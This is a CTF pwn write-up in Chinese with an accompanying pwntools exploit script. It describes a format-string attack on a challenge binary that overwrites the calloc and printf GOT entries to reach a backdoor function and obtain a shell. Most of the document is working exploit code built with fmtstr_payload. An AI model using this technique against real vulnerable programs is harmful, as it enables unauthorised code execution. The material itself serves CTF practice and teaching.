漏洞点
漏洞点很多:
格式化字符串漏洞
后门
泄露libc函数等
不过值得一提的是，栈溢出是假的（那个函数的返回地址由堆上的一个东西管理）
思路
设定了函数 call 前 RSP 以 0 结尾，直接劫持 got 表改写为后门函数会出现栈不对齐错误
所以我们可以劫持两个函数，分两个函数来打，从而更好地控制栈帧
这里把冷门函数 calloc 的 got 表项劫持为 backdoor 的地址
再把 printf 的 got 表项劫持为 call calloc 的地址即可
栈上的格式化字符串的打法比较简单,这里就不多说了
用好fmtstr_payload可以事半功倍
import ctypes  # imported but not used anywhere in this script

from pwn import *
from pwncli import gift  # NOTE: a local `def gift()` later in the file shadows this name

# pwntools context: gdb.attach() opens in a horizontal tmux split,
# every tube exchange is echoed at debug level, packing helpers are 64-bit.
context.update(
    terminal=["tmux", "splitw", "-h"],
    log_level="debug",
    arch="amd64",
)

# Target selection. libc_name / remote_ip / remote_port are left empty here;
# fill them in before switching `mode` to a non-zero value (remote tube).
filename, libc_name, remote_ip, remote_port = "./pwn", "", "", ""
mode = 0  # 0 = local process, anything else = remote(remote_ip, remote_port)
# Short aliases around the global tube `p` (created right below). Each one
# forwards its arguments unchanged and returns whatever the tube method returns.
def s(x):
    return p.send(x)


def r(x):
    return p.recv(x)


def ra():
    return p.recvall()


def rl():
    # keepends=True: the newline stays on the returned line (callers strip it)
    return p.recvline(keepends=True)


def ru(x):
    return p.recvuntil(x)


def sl(x):
    return p.sendline(x)


def sa(x, y):
    return p.sendafter(x, y)


def sla(x, y):
    return p.sendlineafter(x, y)


def ia():
    return p.interactive()


def c():
    return p.close()
# Pick the tube: a remote connection when `mode` is truthy, else a local process.
p = remote(remote_ip, remote_port) if mode else process(filename)
def bpp():
    """Attach gdb to the live tube `p` (in the tmux split from context.terminal), then block until the user continues."""
    gdb.attach(p)
    pause()
def log(x):
    """Print *x* wrapped in ANSI cyan (SGR 36) so it stands out from pwntools' debug output."""
    print(f"\x1B[36m{x}\x1B[0m")
def leak():
    """Consume output up to the next 0x7f byte and unpack its last 6 bytes as a 64-bit integer.

    The 6-byte tail is zero-padded to 8 bytes before u64(). Written for the
    libc-pointer leak mentioned in the writeup, but this script never calls it.
    """
    tail = ru("\x7f")[-6:]
    padded = tail.ljust(8, b'\x00')
    return u64(padded)
# Menu prompt printed by the target before each choice; the helpers below
# synchronise on it via sendlineafter().
prefix = "choose:"
def Repeater(payload):
    """Deliver *payload* (bytes) through the "Repeater" path, NUL-terminated.

    The menu choice 4294967293 is 0xFFFFFFFD, i.e. the unsigned rendering of
    -3 as a 32-bit int — presumably the menu parser does not bound-check its
    choice; confirm against the binary.
    """
    sla(prefix, "4294967293")
    sa("You find a Repeater!", payload + b'\x00')
def chance(payload):
    """Menu option 1: send *payload* raw (no trailing newline). Not used by this script."""
    sla(prefix, "1")
    s(payload)
def gift():
    """Menu option 10086: trigger the target's leak and consume its banner line.

    NOTE: this definition shadows the `gift` imported from pwncli at the top
    of the file; only this local version is called below.
    """
    sla(prefix, "10086")
    ru("Everyone is tired and reduces the workload!")
# Leak stage: after the banner, one line is skipped and the next holds a hex
# address (puts@got, going by the name). It is only logged — nothing below
# uses it, since the chain goes through the in-binary backdoor, not libc.
gift()
rl()
addr_line = rl().decode()
puts_got = int(addr_line[:-1], 16)  # [:-1] drops the newline kept by recvline
log(hex(puts_got))

offset = 6            # format-string argument index at which our buffer begins
ret_addr = 0x401522   # defined but unused in this script
backdoor = 0x401514   # the address the writeup calls "backdoor"
elf = ELF("./pwn")    # same path as `filename`; only .got[...] is read from it
# Two format-string writes (see the writeup's "思路"):
#   stage 1 points calloc@got at `backdoor`;
#   stage 2 points printf@got at 0x40153D, which the writeup identifies as a
#   `call calloc` site, so that the backdoor is entered with RSP aligned instead
#   of directly from a GOT slot.
# NOTE(review): both writes assume the GOT is writable (no Full RELRO) —
# confirm with checksec; Full RELRO is the mitigation that closes this path.
stage1 = fmtstr_payload(offset, {elf.got['calloc']: backdoor})
Repeater(stage1)

stage2 = fmtstr_payload(offset, {elf.got['printf']: 0x40153D})
bpp()  # debug stop before the second write; remove for unattended runs
Repeater(stage2)

ia()